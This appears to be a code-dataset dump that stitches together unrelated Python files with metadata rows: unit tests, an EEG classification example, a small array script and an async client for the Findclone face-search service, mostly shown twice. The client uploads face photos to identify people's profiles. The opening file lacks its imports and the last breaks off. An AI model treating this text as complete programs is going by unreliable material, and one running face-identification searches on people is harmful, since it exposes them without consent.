# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
    """Return a fresh ConeJoint built from two PseudoMotors with a fixed offset."""
    return ConeJoint(slide=PseudoMotor(5),
                     lift=PseudoMotor(10),
                     offset=Point(1, 2, 3))


@pytest.fixture(scope='function')
def pseudo_angle():
    """Return a fresh AngledJoint built from two PseudoMotors with a fixed offset."""
    return AngledJoint(slide=PseudoMotor(5),
                       lift=PseudoMotor(10),
                       offset=Point(1, 2, 3))
def test_cone_joint(pseudo_cone):
    """Vertical alpha maps slide->x and lift->y; horizontal collapses both onto x."""
    #Test Vertical
    pseudo_cone.alpha = math.pi/2.
    assert pytest.approx(pseudo_cone.joint.x) == 5
    assert pytest.approx(pseudo_cone.joint.y) == 10
    #Test Horizontal
    pseudo_cone.alpha= 0
    assert pseudo_cone.joint.x == 15
    assert pseudo_cone.joint.y == 0
def test_cone_invert(pseudo_cone):
    """invert() at 45 degrees recovers the original motor displacements (5, 10)."""
    #Test 45
    pseudo_cone.alpha = math.pi/4.
    assert pseudo_cone.invert((13.07,9.07))[0] == pytest.approx(5,0.1)
    assert pseudo_cone.invert((13.07,9.07))[1] == pytest.approx(10,0.1)
def test_angle_joint(pseudo_angle):
    """AngledJoint.joint swings the lift between y (vertical) and z (horizontal);
    a missing slide zeroes the x component."""
    #Test Vertical
    pseudo_angle.alpha = math.pi/2.
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 10
    assert pytest.approx(pseudo_angle.joint.z) == 0
    #Test Horizontal
    pseudo_angle.alpha = 0
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10
    #Test no-slide
    pseudo_angle.slide = None
    assert pytest.approx(pseudo_angle.joint.x) == 0
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10
def test_angle_invert(pseudo_angle):
    """invert() returns a (slide, lift) pair, or a single lift value with no slide."""
    #Test Vertical
    pseudo_angle.alpha = math.pi/2.
    assert pseudo_angle.invert((6,12))[0] == pytest.approx(5,0.1)
    assert pseudo_angle.invert((6,12))[1] == pytest.approx(10,0.1)
    #Test no-slide
    pseudo_angle.slide = None
    assert pseudo_angle.invert((6,12)) == pytest.approx(10,0.1)
def test_position(pseudo_cone):
    """position is the joint location shifted by the (1, 2, 3) offset."""
    pseudo_cone.alpha= 0
    assert pseudo_cone.position == (16, 2, 3)
    pseudo_cone.alpha = math.pi/2.
    assert pseudo_cone.position.x == pytest.approx(6,0.1)
    assert pseudo_cone.position.y == 12
    assert pseudo_cone.position.z == 3
def test_displacement(pseudo_angle):
    """displacement is (slide, lift), degrading to just lift when slide is absent."""
    assert pseudo_angle.displacement == (5,10)
    pseudo_angle.slide = None
    assert pseudo_angle.displacement == 10
def test_set_joint(pseudo_angle):
    """set_joint drives the motors so displacement matches the requested point."""
    #Vertical
    pseudo_angle.alpha = math.pi/2.
    pseudo_angle.set_joint((6,12))
    assert pseudo_angle.displacement[0] == pytest.approx(5,0.1)
    assert pseudo_angle.displacement[1] == pytest.approx(10,0.1)
    #Test no-slide
    pseudo_angle.slide = None
    pseudo_angle.set_joint((6,12))
    assert pseudo_angle.displacement == pytest.approx(10,0.1)
def test_model(pseudo_angle, pseudo_cone):
    """model() mirrors a joint with ophyd SoftPositioners, preserving
    displacement and an absent slide."""
    model = AngledJoint.model(pseudo_angle)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    #Test no slide
    pseudo_angle.slide = None
    model = AngledJoint.model(pseudo_angle)
    # Identity check instead of `== None` (PEP 8 / flake8 E711).
    assert model.slide is None
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    #Test cone
    model = ConeJoint.model(pseudo_cone)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_cone.displacement
def test_stop(pseudo_cone):
    """stop() must forward the stop request to both underlying motors."""
    pseudo_cone.stop()
    # The fixture's motors record calls; both axes must have been stopped.
    pseudo_cone.slide.stop_call.method.assert_called_with()
    pseudo_cone.lift.stop_call.method.assert_called_with()
def test_cmp():
    """Joints built from the same pair of motors should compare equal."""
    p1 = PseudoMotor(5)
    p2 = PseudoMotor(10)
    assert AngledJoint(p1,p2) == AngledJoint(p1, p2)
| it | 0.347528 | 2.250616 | 2 |
tests/test_utils.py | munirjojoverge/rl_AD_urban_baselines | 6 | 13533 | import numpy as np
from urban_AD_env.utils import rotated_rectangles_intersect
def test_rotated_rectangles_intersect():
    """Exercise overlap detection for rotated and axis-aligned rectangles.

    Each rectangle is given as (center, length, width, heading).
    """
    overlapping = [
        (([12.86076812, 28.60182391], 5.0, 2.0, -0.4675779906495494),
         ([9.67753944, 28.90585412], 5.0, 2.0, -0.3417019364473201)),
        (([0, 0], 2, 1, 0), ([0, 1], 2, 1, 0)),
        (([0, 0], 2, 1, np.pi/4), ([1, 1.1], 2, 1, 0)),
    ]
    disjoint = [
        (([0, 0], 2, 1, 0), ([0, 2.1], 2, 1, 0)),
        (([0, 0], 2, 1, 0), ([1, 1.1], 2, 1, 0)),
    ]
    for rect_a, rect_b in overlapping:
        assert rotated_rectangles_intersect(rect_a, rect_b)
    for rect_a, rect_b in disjoint:
        assert not rotated_rectangles_intersect(rect_a, rect_b)
| import numpy as np
from urban_AD_env.utils import rotated_rectangles_intersect
def test_rotated_rectangles_intersect():
assert rotated_rectangles_intersect(([12.86076812, 28.60182391], 5.0, 2.0, -0.4675779906495494),
([9.67753944, 28.90585412], 5.0, 2.0, -0.3417019364473201))
assert rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([0, 2.1], 2, 1, 0))
assert not rotated_rectangles_intersect(([0, 0], 2, 1, 0), ([1, 1.1], 2, 1, 0))
assert rotated_rectangles_intersect(([0, 0], 2, 1, np.pi/4), ([1, 1.1], 2, 1, 0))
| none | 1 | 2.352878 | 2 |
learning_journal/tests.py | hcodydibble/pyramid-learning-journal | 0 | 13534 | """Functions that test server functions."""
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from datetime import datetime
from learning_journal.models import Entry
def test_list_view_returns_list_of_entries_in_dict(dummy_request):
    """list_view should expose its entries as a list under 'journals'."""
    from learning_journal.views.default import list_view
    response = list_view(dummy_request)
    assert 'journals' in response
    assert isinstance(response['journals'], list)
def test_adding_to_dummy_db_works(dummy_request):
    """An Entry added through the dummy session should become queryable."""
    # The per-test database starts empty.
    assert len(dummy_request.dbsession.query(Entry).all()) == 0
    test_entry = Entry(
        title="Fake Title",
        creation_date=datetime.now(),
        body="The body lul"
    )
    dummy_request.dbsession.add(test_entry)
    assert len(dummy_request.dbsession.query(Entry).all()) == 1
def test_list_view_returns_a_dict(dummy_request):
    """list_view should return a template-context dict."""
    from learning_journal.views.default import list_view
    response = list_view(dummy_request)
    assert isinstance(response, dict)
def test_list_view_returns_proper_amount_of_content(dummy_request):
    """list_view should return one item per Entry row in the database."""
    from learning_journal.views.default import list_view
    response = list_view(dummy_request)
    query = dummy_request.dbsession.query(Entry).all()
    assert len(response["journals"]) == len(query)
def test_about_view_returns_a_dict(dummy_request):
    """about_view should return a template-context dict."""
    from learning_journal.views.default import about_view
    response = about_view(dummy_request)
    assert isinstance(response, dict)
def test_create_view_returns_a_dict(dummy_request):
    """create_view should return a template-context dict for a plain request."""
    from learning_journal.views.default import create_view
    response = create_view(dummy_request)
    assert isinstance(response, dict)
def test_detail_view_returns_post_detail(dummy_request):
    """detail_view should return the entry matching the id in matchdict."""
    from learning_journal.views.default import detail_view
    test_entry = Entry(
        title="Fake Title",
        creation_date=datetime.now(),
        body="The body lul"
    )
    dummy_request.dbsession.add(test_entry)
    # NOTE(review): assumes the freshly added row receives primary key 1 --
    # holds for a clean per-test database; verify the fixture guarantees it.
    dummy_request.matchdict['id'] = 1
    response = detail_view(dummy_request)
    assert response['post'].title == "Fake Title"
def test_create_view_get_empty_is_empty_dict(dummy_request):
    """A GET request to create_view should yield an empty context dict."""
    from learning_journal.views.default import create_view
    dummy_request.method = "GET"
    response = create_view(dummy_request)
    assert response == {}
def test_create_view_post_works(dummy_request):
    """A complete POST to create_view should create the entry and redirect."""
    from learning_journal.views.default import create_view
    dummy_request.method = "POST"
    test_post = {"title": "Test", "body": "This is a body."}
    dummy_request.POST = test_post
    response = create_view(dummy_request)
    # 302 Found: the view redirects after a successful creation.
    assert response.status_code == 302
def test_create_view_raises_bad_request(dummy_request):
    """An incomplete POST (missing 'body') should raise HTTPBadRequest."""
    from learning_journal.views.default import create_view
    dummy_request.method = "POST"
    test_post = {"title": "Test"}
    dummy_request.POST = test_post
    with pytest.raises(HTTPBadRequest):
        create_view(dummy_request)
def test_new_entry_redirects_to_home_page(testapp, empty_db):
    """Posting a new entry through the full app should redirect home."""
    test_entry = {
        "title": "Fake Title",
        "body": "The body lul"
    }
    response = testapp.post("/journal/new-entry", test_entry)
    assert response.location == "http://localhost/"
| """Functions that test server functions."""
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from datetime import datetime
from learning_journal.models import Entry
def test_list_view_returns_list_of_entries_in_dict(dummy_request):
"""Test for the list_view function."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert 'journals' in response
assert isinstance(response['journals'], list)
def test_adding_to_dummy_db_works(dummy_request):
"""Test that adding to dummy db works."""
assert len(dummy_request.dbsession.query(Entry).all()) == 0
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
assert len(dummy_request.dbsession.query(Entry).all()) == 1
def test_list_view_returns_a_dict(dummy_request):
"""Function to test if list_view returns a dict."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
assert isinstance(response, dict)
def test_list_view_returns_proper_amount_of_content(dummy_request):
"""Home view response has content."""
from learning_journal.views.default import list_view
response = list_view(dummy_request)
query = dummy_request.dbsession.query(Entry).all()
assert len(response["journals"]) == len(query)
def test_about_view_returns_a_dict(dummy_request):
"""Test that about view returns dict."""
from learning_journal.views.default import about_view
response = about_view(dummy_request)
assert isinstance(response, dict)
def test_create_view_returns_a_dict(dummy_request):
"""Test that create view returns dict."""
from learning_journal.views.default import create_view
response = create_view(dummy_request)
assert isinstance(response, dict)
def test_detail_view_returns_post_detail(dummy_request):
"""Test that detail view returns post details."""
from learning_journal.views.default import detail_view
test_entry = Entry(
title="Fake Title",
creation_date=datetime.now(),
body="The body lul"
)
dummy_request.dbsession.add(test_entry)
dummy_request.matchdict['id'] = 1
response = detail_view(dummy_request)
assert response['post'].title == "Fake Title"
def test_create_view_get_empty_is_empty_dict(dummy_request):
"""Test that GET request on create view returns empty dict."""
from learning_journal.views.default import create_view
dummy_request.method = "GET"
response = create_view(dummy_request)
assert response == {}
def test_create_view_post_works(dummy_request):
"""Test that create view post creates new entry."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test", "body": "This is a body."}
dummy_request.POST = test_post
response = create_view(dummy_request)
assert response.status_code == 302
def test_create_view_raises_bad_request(dummy_request):
"""Test that an incomplete post request returns HTTPBadRequest."""
from learning_journal.views.default import create_view
dummy_request.method = "POST"
test_post = {"title": "Test"}
dummy_request.POST = test_post
with pytest.raises(HTTPBadRequest):
create_view(dummy_request)
def test_new_entry_redirects_to_home_page(testapp, empty_db):
"""Test that after adding a new entry you get redirected to home page."""
test_entry = {
"title": "Fake Title",
"body": "The body lul"
}
response = testapp.post("/journal/new-entry", test_entry)
assert response.location == "http://localhost/"
| pt | 0.155091 | 2.875879 | 3 |
hvad/exceptions.py | Kunpors/dr.pors- | 1 | 13535 | <filename>hvad/exceptions.py
""" Hvad-specific exceptions
Part of hvad public API.
"""
__all__ = ('WrongManager', )
class WrongManager(Exception):
    """ Raised when attempting to introspect translated fields from
        shared models without going through hvad. The most likely cause
        for this being accessing translated fields from
        translation-unaware QuerySets.

        Attributes:
            meta -- the model's options object (its model_name is shown)
            name -- the translated field whose access triggered the error
    """
    def __init__(self, meta, name):
        self.meta = meta
        self.name = name

    def __str__(self):
        # Build an actionable message pointing at the offending access.
        # Grammar fixed ("a regular", was "an regular"); the unused
        # app_label format argument was dropped (the template never
        # referenced it).
        return (
            "Accessing translated fields like {model_name}.{field_name} from "
            "a regular model requires a translation-aware queryset, "
            "obtained with the .language() method. "
            "For regular, non-translatable models, you can get one using "
            "hvad.utils.get_translation_aware_manager"
        ).format(
            model_name=self.meta.model_name,
            field_name=self.name,
        )
| <filename>hvad/exceptions.py
""" Hvad-specific exceptions
Part of hvad public API.
"""
__all__ = ('WrongManager', )
class WrongManager(Exception):
""" Raised when attempting to introspect translated fields from
shared models without going through hvad. The most likely cause
for this being accessing translated fields from
translation-unaware QuerySets.
"""
def __init__(self, meta, name):
self.meta = meta
self.name = name
def __str__(self):
return (
"Accessing translated fields like {model_name}.{field_name} from "
"an regular model requires a translation-aware queryset, "
"obtained with the .language() method. "
"For regular, non-translatable models, you can get one using "
"hvad.utils.get_translation_aware_manager"
).format(
app_label=self.meta.app_label,
model_name=self.meta.model_name,
field_name=self.name,
)
| pt | 0.14209 | 2.305009 | 2 |
examples/ERP/classify_P300_bi.py | gcattan/pyRiemann-qiskit | 7 | 13536 | <reponame>gcattan/pyRiemann-qiskit
"""
====================================================================
Classification of P300 datasets from MOABB
====================================================================
It demonstrates the QuantumClassifierWithDefaultRiemannianPipeline(). This
pipeline uses Riemannian Geometry, Tangent Space and a quantum SVM
classifier. MOABB is used to access many EEG datasets and also for the
evaluation and comparison with other classifiers.
In QuantumClassifierWithDefaultRiemannianPipeline():
If parameter "shots" is None then a classical SVM is used similar to the one
in scikit learn.
If "shots" is not None and IBM Qunatum token is provided with "q_account_token"
then a real Quantum computer will be used.
You also need to adjust the "n_components" in the PCA procedure to the number
of qubits supported by the real quantum computer you are going to use.
A list of real quantum computers is available in your IBM quantum account.
"""
# Author: <NAME>
# Modified from plot_classify_EEG_tangentspace.py of pyRiemann
# License: BSD (3-clause)
from pyriemann.estimation import XdawnCovariances
from pyriemann.tangentspace import TangentSpace
from sklearn.pipeline import make_pipeline
from matplotlib import pyplot as plt
import warnings
import seaborn as sns
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from moabb import set_log_level
from moabb.datasets import bi2012
from moabb.evaluations import WithinSessionEvaluation
from moabb.paradigms import P300
from pyriemann_qiskit.classification import \
QuantumClassifierWithDefaultRiemannianPipeline
from sklearn.decomposition import PCA
print(__doc__)
##############################################################################
# getting rid of the warnings about the future
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore")
set_log_level("info")
##############################################################################
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
##############################################################################
# We have to do this because the classes are called 'Target' and 'NonTarget'
# but the evaluation function uses a LabelEncoder, transforming them
# to 0 and 1
labels_dict = {"Target": 1, "NonTarget": 0}
paradigm = P300(resample=128)
datasets = [bi2012()] # MOABB provides several other P300 datasets
# reduce the number of subjects, the Quantum pipeline takes a lot of time
# if executed on the entire dataset
n_subjects = 5
for dataset in datasets:
dataset.subject_list = dataset.subject_list[0:n_subjects]
overwrite = True # set to True if we want to overwrite cached results
pipelines = {}
# A Riemannian Quantum pipeline provided by pyRiemann-qiskit
# You can choose between classical SVM and Quantum SVM.
pipelines["RG+QuantumSVM"] = QuantumClassifierWithDefaultRiemannianPipeline(
shots=None, # 'None' forces classic SVM
nfilter=2, # default 2
# default n_components=10, a higher value renders better performance with
# the non-qunatum SVM version used in qiskit
# On a real Quantum computer (n_components = qubits)
dim_red=PCA(n_components=5),
# params={'q_account_token': '<IBM Quantum TOKEN>'}
)
# Here we provide a pipeline for comparison:
# This is a standard pipeline similar to
# QuantumClassifierWithDefaultRiemannianPipeline, but with LDA classifier
# instead.
pipelines["RG+LDA"] = make_pipeline(
# applies XDawn and calculates the covariance matrix, output it matrices
XdawnCovariances(
nfilter=2,
classes=[labels_dict["Target"]],
estimator="lwf",
xdawn_estimator="scm"
),
TangentSpace(),
PCA(n_components=10),
LDA(solver="lsqr", shrinkage="auto"), # you can use other classifiers
)
print("Total pipelines to evaluate: ", len(pipelines))
evaluation = WithinSessionEvaluation(
paradigm=paradigm,
datasets=datasets,
suffix="examples",
overwrite=overwrite
)
results = evaluation.process(pipelines)
print("Averaging the session performance:")
print(results.groupby('pipeline').mean('score')[['score', 'time']])
##############################################################################
# Plot Results
# ----------------
#
# Here we plot the results to compare the two pipelines
# Plot the per-session scores of the two pipelines side by side.
fig, ax = plt.subplots(facecolor="white", figsize=[8, 4])

# Individual session scores as jittered points...
sns.stripplot(
    data=results,
    y="score",
    x="pipeline",
    ax=ax,
    jitter=True,
    alpha=0.5,
    zorder=1,
    palette="Set1",
)
# ...with the mean (and confidence interval) overlaid.
sns.pointplot(data=results,
              y="score",
              x="pipeline",
              ax=ax, zorder=1,
              palette="Set1")

ax.set_ylabel("ROC AUC")
ax.set_ylim(0.3, 1)
plt.show()
| """
====================================================================
Classification of P300 datasets from MOABB
====================================================================
It demonstrates the QuantumClassifierWithDefaultRiemannianPipeline(). This
pipeline uses Riemannian Geometry, Tangent Space and a quantum SVM
classifier. MOABB is used to access many EEG datasets and also for the
evaluation and comparison with other classifiers.
In QuantumClassifierWithDefaultRiemannianPipeline():
If parameter "shots" is None then a classical SVM is used similar to the one
in scikit learn.
If "shots" is not None and IBM Qunatum token is provided with "q_account_token"
then a real Quantum computer will be used.
You also need to adjust the "n_components" in the PCA procedure to the number
of qubits supported by the real quantum computer you are going to use.
A list of real quantum computers is available in your IBM quantum account.
"""
# Author: <NAME>
# Modified from plot_classify_EEG_tangentspace.py of pyRiemann
# License: BSD (3-clause)
from pyriemann.estimation import XdawnCovariances
from pyriemann.tangentspace import TangentSpace
from sklearn.pipeline import make_pipeline
from matplotlib import pyplot as plt
import warnings
import seaborn as sns
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from moabb import set_log_level
from moabb.datasets import bi2012
from moabb.evaluations import WithinSessionEvaluation
from moabb.paradigms import P300
from pyriemann_qiskit.classification import \
QuantumClassifierWithDefaultRiemannianPipeline
from sklearn.decomposition import PCA
print(__doc__)
##############################################################################
# getting rid of the warnings about the future
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore")
set_log_level("info")
##############################################################################
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
##############################################################################
# We have to do this because the classes are called 'Target' and 'NonTarget'
# but the evaluation function uses a LabelEncoder, transforming them
# to 0 and 1
labels_dict = {"Target": 1, "NonTarget": 0}
paradigm = P300(resample=128)
datasets = [bi2012()] # MOABB provides several other P300 datasets
# reduce the number of subjects, the Quantum pipeline takes a lot of time
# if executed on the entire dataset
n_subjects = 5
for dataset in datasets:
dataset.subject_list = dataset.subject_list[0:n_subjects]
overwrite = True # set to True if we want to overwrite cached results
pipelines = {}
# A Riemannian Quantum pipeline provided by pyRiemann-qiskit
# You can choose between classical SVM and Quantum SVM.
pipelines["RG+QuantumSVM"] = QuantumClassifierWithDefaultRiemannianPipeline(
shots=None, # 'None' forces classic SVM
nfilter=2, # default 2
# default n_components=10, a higher value renders better performance with
# the non-qunatum SVM version used in qiskit
# On a real Quantum computer (n_components = qubits)
dim_red=PCA(n_components=5),
# params={'q_account_token': '<IBM Quantum TOKEN>'}
)
# Here we provide a pipeline for comparison:
# This is a standard pipeline similar to
# QuantumClassifierWithDefaultRiemannianPipeline, but with LDA classifier
# instead.
pipelines["RG+LDA"] = make_pipeline(
# applies XDawn and calculates the covariance matrix, output it matrices
XdawnCovariances(
nfilter=2,
classes=[labels_dict["Target"]],
estimator="lwf",
xdawn_estimator="scm"
),
TangentSpace(),
PCA(n_components=10),
LDA(solver="lsqr", shrinkage="auto"), # you can use other classifiers
)
print("Total pipelines to evaluate: ", len(pipelines))
evaluation = WithinSessionEvaluation(
paradigm=paradigm,
datasets=datasets,
suffix="examples",
overwrite=overwrite
)
results = evaluation.process(pipelines)
print("Averaging the session performance:")
print(results.groupby('pipeline').mean('score')[['score', 'time']])
##############################################################################
# Plot Results
# ----------------
#
# Here we plot the results to compare the two pipelines
fig, ax = plt.subplots(facecolor="white", figsize=[8, 4])
sns.stripplot(
data=results,
y="score",
x="pipeline",
ax=ax,
jitter=True,
alpha=0.5,
zorder=1,
palette="Set1",
)
sns.pointplot(data=results,
y="score",
x="pipeline",
ax=ax, zorder=1,
palette="Set1")
ax.set_ylabel("ROC AUC")
ax.set_ylim(0.3, 1)
plt.show() | it | 0.253788 | 2.234227 | 2 |
copy-the-content-of-one-array-into-another-in-the-reverse-order.py | kRituraj/python-programming | 0 | 13537 | <filename>copy-the-content-of-one-array-into-another-in-the-reverse-order.py
"""Copy the contents of one array into another in reverse order."""


def reversed_copy(values):
    """Return a new list holding *values* in reverse order."""
    return list(reversed(values))


def main():
    """Build [1..20], copy it reversed, and print it space-separated."""
    source = list(range(1, 21))
    reversed_values = reversed_copy(source)
    # Match the original output format exactly: numbers separated by
    # single spaces, with a trailing space and no final newline.
    print(*reversed_values, end=" ")


if __name__ == "__main__":
    main()
from array import *
MyArray = [None] * 20
MyArray1 = [None] * 20
i = 0
while(i < 20):
MyArray[i] = i + 1
i = i + 1
j = 0
i = 19
while(j < 20):
MyArray1[j] = MyArray[i]
j = j + 1
i = i - 1
i = 0
while(i < 20):
print(MyArray1[i],end = " ")
i = i + 1 | none | 1 | 3.541529 | 4 |
Findclone/aiofindclone.py | vypivshiy/Findclone_api | 5 | 13538 | from aiohttp import ClientSession, FormData
from io import BufferedReader, BytesIO
from typing import Optional, Union

from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
class FindcloneAsync:
    """async findclone api class

    Attributes:
        headers : dict - headers sent with every request (user agent plus,
            after login, the session credentials)
    """
    def __init__(self):
        self._session = ClientSession()
        self.headers = {"User-Agent": f"findclone-api/{__version__}"}
        self.__builder = get_builder().build_aio_response
        self._session_key = None
        self._userid = None
        self.__info = None

    async def login(self,
                    login: Optional[str] = None,
                    password: Optional[str] = None,
                    session_key: Optional[str] = None,
                    userid: Union[str, int, None] = None) -> bool:
        """
        *coro
        Findclone authorisation, with credentials or a saved session.
        :param login: account login
        :param password: account password
        :param session_key: account session_key
        :param userid: account userid
        :return: True is auth success
        :raises FindcloneError: if neither credential pair is supplied
        """
        if login and password:
            async with self._session.post("https://findclone.ru/login",
                                          data={"phone": login,
                                                "password": password}) as response:
                await a_error_handler(response)
                resp = await response.json()
                self.__info = await self.__builder(response)
                self._session_key = resp["session_key"]
                self._userid = resp["userid"]
                self.headers.update({'session-key': self._session_key,
                                     'user-id': str(self._userid)})
                return True
        elif session_key and userid:
            # Reuse a stored session; validate it by fetching the profile.
            self.headers.update({"session-key": session_key, "user-id": str(userid)})
            async with self._session.get("https://findclone.ru/profile",
                                         headers=self.headers) as response:
                await a_error_handler(response)
                self.__info = await self.__builder(response)
                self._session_key = session_key
                self._userid = userid
                return True
        else:
            raise FindcloneError("Need login and password or session-key and _userid")

    @property
    async def info(self) -> Account:
        """
        *coro
        return account information
        :return: Account object
        """
        async with self._session.get("https://findclone.ru/profile",
                                     headers=self.headers) as response:
            info = await self.__builder(response)
            self.__info = info
            return info

    async def upload(self,
                     file: Union[str, BufferedReader],
                     face_box_id: Optional[int] = None,
                     timeout: float = 180) -> Union[Profiles, BytesIO]:
        """
        *coro
        upload image, image url or open binary stream and return Profiles
        object or BytesIO object
        :param file: image direct download link, path, or open binary reader
        :param face_box_id: OPTIONAL, send facebox id if 2 or more faces are detected
        :param timeout: OPTIONAL - max timeout delay
        :return: Profiles object or BytesIO if 2 or more faces are detected
        """
        data = FormData()
        filename = f"{random_string()}.png"
        if isinstance(file, str) and file.startswith("http"):
            # Direct download link: fetch the raw image bytes first.
            async with self._session.get(file, headers=self.headers) as response:
                file = await response.read()
            data.add_field("uploaded_photo", file, filename=filename,
                           content_type="image/png")
        elif isinstance(file, str):
            # Local file path.
            data.add_field("uploaded_photo", open(file, "rb"), filename=filename,
                           content_type="image/png")
        else:
            # Already-open binary stream (BufferedReader / BytesIO).
            # Previously this case crashed on str-only methods even though
            # the type hint advertised it.
            data.add_field("uploaded_photo", file, filename=filename,
                           content_type="image/png")
        async with self._session.post("https://findclone.ru/upload2", data=data,
                                      headers=self.headers,
                                      timeout=timeout) as response:
            resp = await response.json()
            if resp.get("faceBoxes"):
                if face_box_id is not None:
                    # Caller picked a face: resolve the search for that box.
                    async with self._session.get("https://findclone.ru/upload3",
                                                 params={"id": face_box_id},
                                                 headers=self.headers) as response2:
                        return await self.__builder(response2)
                # Several faces and no choice made: return annotated image bytes.
                return paint_boxes(file, resp)
            return await self.__builder(response)

    async def history(self, offset: int = 0, count: int = 100) -> Histories:
        """
        *coro
        return object histories search for account
        :param offset: int
        :param count: int
        :return: Histories object
        """
        async with self._session.get("https://findclone.ru/hist",
                                     params={"offset": offset, "count": count},
                                     headers=self.headers) as response:
            return await self.__builder(response)

    async def search(self, search_id: Union[int, str], count: int = 128) -> Profiles:
        """
        *coro
        :param search_id: [int, str] search id
        :param count: [int] max Profiles count get
        :return: Profiles object
        """
        async with self._session.get("https://findclone.ru/search",
                                     params={"id": search_id, "count": count},
                                     headers=self.headers) as response:
            return await self.__builder(response)

    @property
    def get_session(self) -> dict:
        """
        property
        return session-key and _userid account
        :return: dict {"session-key": session_key, "user-id": userid}
        """
        return {"session-key": self._session_key, "user-id": self._userid}

    def __str__(self):
        # Delegates to the cached profile info (the string "None" pre-login).
        return self.__info.__str__()

    async def __aenter__(self) -> 'FindcloneAsync':
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
        await self._session.close()

    async def close(self) -> None:
        """*coro - close the underlying HTTP session."""
        await self._session.close()
| from aiohttp import ClientSession, FormData
from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
from io import BufferedReader, BytesIO
class FindcloneAsync:
"""async findclone api class
Attributes:
headers : dict - set requests headers
"""
def __init__(self):
self._session = ClientSession()
self.headers = {"User-Agent": f"findclone-api/{__version__}"}
self.__builder = get_builder().build_aio_response
self._session_key = None
self._userid = None
self.__info = None
async def login(self,
login: [str, None] = None,
password: [str, None] = None,
session_key: [str, None] = None,
userid: [str, int, None] = None) -> bool:
"""
*coro
Findclone authorisation
:param login: account login
:param password: account password
:param session_key: account session_key
:param userid: account userid
:return: True is auth success
"""
if login and password:
async with self._session.post("https://findclone.ru/login", data={"phone": login,
"password": password}) as response:
await a_error_handler(response)
resp = await response.json()
self.__info = await self.__builder(response)
self._session_key = resp["session_key"]
self._userid = resp["userid"]
self.headers.update({'session-key': self._session_key, 'user-id': str(self._userid)})
return True
elif session_key and userid:
self.headers.update({"session-key": session_key, "user-id": str(userid)})
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
await a_error_handler(response)
self.__info = await self.__builder(response)
self._session_key = session_key
self._userid = userid
return True
else:
raise FindcloneError("Need login and password or session-key and _userid")
@property
async def info(self) -> Account:
"""
*coro
return account information
:return: Account object
"""
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
info = await self.__builder(response)
self.__info = info
return info
async def upload(self,
file: [str, BufferedReader],
face_box_id: int = None,
timeout: float = 180) -> [Profiles, BytesIO]:
"""
*coro
upload image or image url and return Profiles object or BytesIO object
:param file: image direct download link or path
:param face_box_id: OPTIONAL, send facebox id if 2 or more faces are detected
:param timeout: OPTIONAL - max timeout delay
:return: Profiles object or BytesIO if 2 or more faces are detected
"""
data = FormData()
if file.startswith("http"):
async with self._session.get(file, headers=self.headers) as response:
file = await response.read()
data.add_field("uploaded_photo", file, filename=f"{random_string()}.png", content_type="image/png")
else:
data.add_field("uploaded_photo", open(file, "rb"), filename=f"{random_string()}.png",
content_type="image/png")
async with self._session.post("https://findclone.ru/upload2", data=data, headers=self.headers,
timeout=timeout) as response:
resp = await response.json()
if resp.get("faceBoxes"):
if face_box_id is not None:
async with self._session.get("https://findclone.ru/upload3", params={"id": face_box_id},
headers=self.headers) as response2:
resp = await self.__builder(response2)
return resp
else:
img_bytes = paint_boxes(file, resp) # return bytesIO object
return img_bytes
resp = await self.__builder(response)
return resp
async def history(self, offset: int = 0, count: int = 100) -> Histories:
"""
*coro
return object histories search for account
:param offset: int
:param count: int
:return: Histories object
"""
async with self._session.get("https://findclone.ru/hist", params={"offset": offset, "count": count},
headers=self.headers) as response:
history = await self.__builder(response)
return history
async def search(self, search_id: [int, str], count: int = 128) -> Profiles:
"""
*coro
:param search_id: [int, str] search id
:param count: [int] max Profiles count get
:return: Profiles object
"""
async with self._session.get("https://findclone.ru/search", params={"id": search_id, "count": count},
headers=self.headers) as response:
search_result = await self.__builder(response)
return search_result
@property
def get_session(self) -> dict:
"""
property
return session-key and _userid account
:return: dict {"session-key": session_key, "user-id": userid}
"""
_session = {"session-key": self._session_key, "user-id": self._userid}
return _session
def __str__(self):
return self.__info.__str__()
async def __aenter__(self) -> 'FindcloneAsync':
return self
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
await self._session.close()
async def close(self) -> None:
